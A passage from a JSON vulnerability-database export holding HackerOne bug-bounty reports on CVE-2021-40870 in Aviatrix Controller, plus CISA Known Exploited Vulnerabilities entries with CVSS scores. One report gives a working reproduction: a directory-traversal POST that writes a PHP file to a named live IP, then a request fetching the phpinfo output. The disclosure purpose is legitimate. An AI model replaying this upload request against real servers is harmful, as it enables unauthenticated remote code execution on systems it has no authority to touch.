Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n```\nWhich is basically the output of the phpinfo function:\n\nResponse (truncated): \n```\n<tr class=\"h\"><th>Variable</th><th>Value</th></tr>\n<tr><td class=\"e\">SCRIPT_URL </td><td class=\"v\">/v1/1.php </td></tr>\n<tr><td class=\"e\">SCRIPT_URI </td><td class=\"v\">https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/v1/1.php </td></tr>\n<tr><td class=\"e\">HTTPS </td><td class=\"v\">on </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_C </td><td class=\"v\">US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_ST </td><td class=\"v\">California </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_L </td><td class=\"v\">Redwood City </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_O </td><td class=\"v\">Informatica LLC </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_OU </td><td class=\"v\">\u2588\u2588\u2588\u2588\u2588\u2588 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_CN </td><td class=\"v\">\u2588\u2588\u2588\u2588\u2588\u2588 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_C </td><td class=\"v\">US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_O </td><td class=\"v\">HydrantID (Avalanche Cloud Corporation) </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_CN </td><td class=\"v\">HydrantID SSL ICA G2 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_SAN_DNS_0 </td><td class=\"v\">\u2588\u2588\u2588 </td></tr>\n<tr><td class=\"e\">SSL_VERSION_INTERFACE </td><td class=\"v\">mod_ssl/2.4.39 </td></tr>\n ```\n\n## Impact\n\n- An unauthenticated, 3rd-party attacker or adversary can execute remote code\n \n### Supporting Material/References\nhttps://vulners.com/cve/CVE-2021-40870", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T04:33:57", "type": "hackerone", "title": "Informatica: CVE-2021-40870 in [\u2588\u2588\u2588]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-11-15T09:10:36", "id": "H1:1360593", "href": "https://hackerone.com/reports/1360593", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:49:42", "bounty": 1760.0, "description": "An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.\n\nThe IP has a SSL certificate pointing to ElasticSearch. \n``curl -kv https://52.204.160.31``\n\nOutput\n\n```\n Server certificate:\n* subject: C=US; ST=California; L=Mountain View; O=Elasticsearch, Inc.; CN=*.elasticit.co\n```\n\n\n## Steps To Reproduce\n\nFirst, run this request:\n```\nPOST /v1/backend1 HTTP/1.1\nHost: 52.204.160.31\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\nConnection: close\nContent-Length: 136\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?>\n\n```\nThe retrieve the content from file ``1yv4QQmkj4h4OdmmyT11tkiGf5M.php``\n\n```\nGET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1\nHost: 52.204.160.31\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n```\nWhich is basically the output of the phpinfo function:\n\nResponse (truncated): \n```\ntr class=\"h\"><th>Variable</th><th>Value</th></tr>\n<tr><td class=\"e\">SCRIPT_URL </td><td class=\"v\">/v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php </td></tr>\n<tr><td class=\"e\">SCRIPT_URI </td><td class=\"v\">https://52.204.160.31:8443/v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php </td></tr>\n<tr><td class=\"e\">HTTPS </td><td class=\"v\">on </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_C </td><td class=\"v\">US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_ST </td><td class=\"v\">California </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_L </td><td class=\"v\">Mountain View </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_O </td><td class=\"v\">Elasticsearch, Inc. </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_CN </td><td class=\"v\">*.elasticit.co </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_C </td><td class=\"v\">US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_O </td><td class=\"v\">DigiCert Inc </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_CN </td><td class=\"v\">DigiCert SHA2 Secure Server CA </td></tr>\n<tr><td class=\"e\">SSL_SERVER_SAN_DNS_0 </td><td class=\"v\">*.elasticit.co </td></tr>\n<tr><td class=\"e\">SSL_SERVER_SAN_DNS_1 </td><td class=\"v\">elasticit.co </td></tr>\n<tr><td class=\"e\">SSL_VERSION_INTERFACE </td><td class=\"v\">mod_ssl/2.4.39 </td></tr>\n<tr><td class=\"e\">SSL_VERSION_LIBRARY </td><td class=\"v\">OpenSSL/1.1.1b </td></tr>\n<tr><td class=\"e\">SSL_PROTOCOL </td><td class=\"v\">TLSv1.2 </td></tr>\n<tr><td class=\"e\">SSL_SECURE_RENEG </td><td class=\"v\">true </td></tr>\n<tr><td class=\"e\">SSL_COMPRESS_METHOD </td><td class=\"v\">NULL </td></tr>\n<tr><td class=\"e\">SSL_CIPHER </td><td class=\"v\">ECDHE-RSA-AES128-GCM-SHA256 </td></tr>\n<tr><td class=\"e\">SSL_CIPHER_EXPORT </td><td class=\"v\">false </td></tr>\n<tr><td class=\"e\">SSL_CIPHER_USEKEYSIZE </td><td class=\"v\">128 </td></tr>\n<tr><td class=\"e\">SSL_CIPHER_ALGKEYSIZE </td><td class=\"v\">128 </td></tr>\n<tr><td class=\"e\">SSL_CLIENT_VERIFY </td><td class=\"v\">NONE </td></tr>\n<tr><td class=\"e\">SSL_SERVER_M_VERSION </td><td class=\"v\">3 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_M_SERIAL </td><td class=\"v\">093CE89EF93EE5F18D1E07099ACC5AF9 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_V_START </td><td class=\"v\">Mar 20 00:00:00 2020 GMT </td></tr>\n<tr><td class=\"e\">SSL_SERVER_V_END </td><td class=\"v\">Mar 25 12:00:00 2022 GMT </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN </td><td class=\"v\">CN=*.elasticit.co,O=Elasticsearch\\, Inc.,L=Mountain View,ST=California,C=US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN </td><td class=\"v\">CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_A_KEY </td><td class=\"v\">rsaEncryption </td></tr>\n<tr><td class=\"e\">SSL_SERVER_A_SIG </td><td class=\"v\">sha256WithRSAEncryption </td></tr>\n<tr><td class=\"e\">SSL_SESSION_ID </td><td class=\"v\">9cf6b4b42df9e371982120b49d57f9112c19df3722fb87d15cc592f73e1fa406 </td></tr>\n<tr><td class=\"e\">SSL_SESSION_RESUMED </td><td class=\"v\">Initial </td></tr>\n<tr><td class=\"e\">HTTP_HOST </td><td class=\"v\">52.204.160.31 </td></tr>\n<tr><td class=\"e\">HTTP_USER_AGENT </td><td class=\"v\">Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 </td></tr>\n<tr><td class=\"e\">HTTP_CONNECTION </td><td class=\"v\">close </td></tr>\n ```\n\n## Impact\n\n- An unauthenticated, 3rd-party attacker or adversary can execute remote code\n \n### Supporting Material/References\nhttps://vulners.com/cve/CVE-2021-40870", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-01T20:20:56", "type": "hackerone", "title": "Elastic: CVE-2021-40870 on [52.204.160.31]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-10-06T16:06:41", "id": "H1:1356845", "href": "https://hackerone.com/reports/1356845", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-05-23T17:17:33", "description": "Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Aviatrix Controller Unrestricted Upload of File", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-40870", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "October CMS Improper Authentication", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-32648", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Nagios XI OS Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25297"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-25297", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Nagios XI OS Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25298"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-25298", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "The Traffic Management Microkernel of BIG-IP ASM Risk Engine has a buffer overflow vulnerability, leading to a bypassing of URL-based access controls.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "F5 BIG-IP Traffic Management Microkernel Buffer Overflow", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22991"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-22991", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Nagios XI OS Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-25296", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:37:18", "description": "A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Apache Airflow Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2020-11978", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "In this vulnerability, an attacker can send a malicious payload that will exploit the name parameter. After successful exploitation, attackers can execute remote.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "System Information Library for Node.JS Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-21315", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T15:37:18", "description": "The previous default setting for Airflow's Experimental API was to allow all API requests without authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Apache Airflow's Experimental API Authentication Bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2020-13927", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T17:17:33", "description": "Microsoft Exchange Server contains an information disclosure vulnerability which can allow an unauthenticated attacker to steal email traffic from target.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Information Disclosure", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-33766", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Server Side Request Forgery (SSRF) in vRealize Operations Manager API prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API to perform a SSRF attack to steal administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "VMware Server Side Request Forgery in vRealize Operations Manager API", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-21975", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-05T15:37:18", "description": "Improper sanitization in the extension file names is present in Drupal core.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Drupal core Un-restricted Upload of File", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2020-13671", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T15:37:18", "description": "Path traversal vulnerability, where an attacker can target the preview FilePath parameter of the getPreviewImage function to get access to arbitrary system file.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Oracle Business Intelligence Enterprise Edition Path Transversal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14864"], "modified": 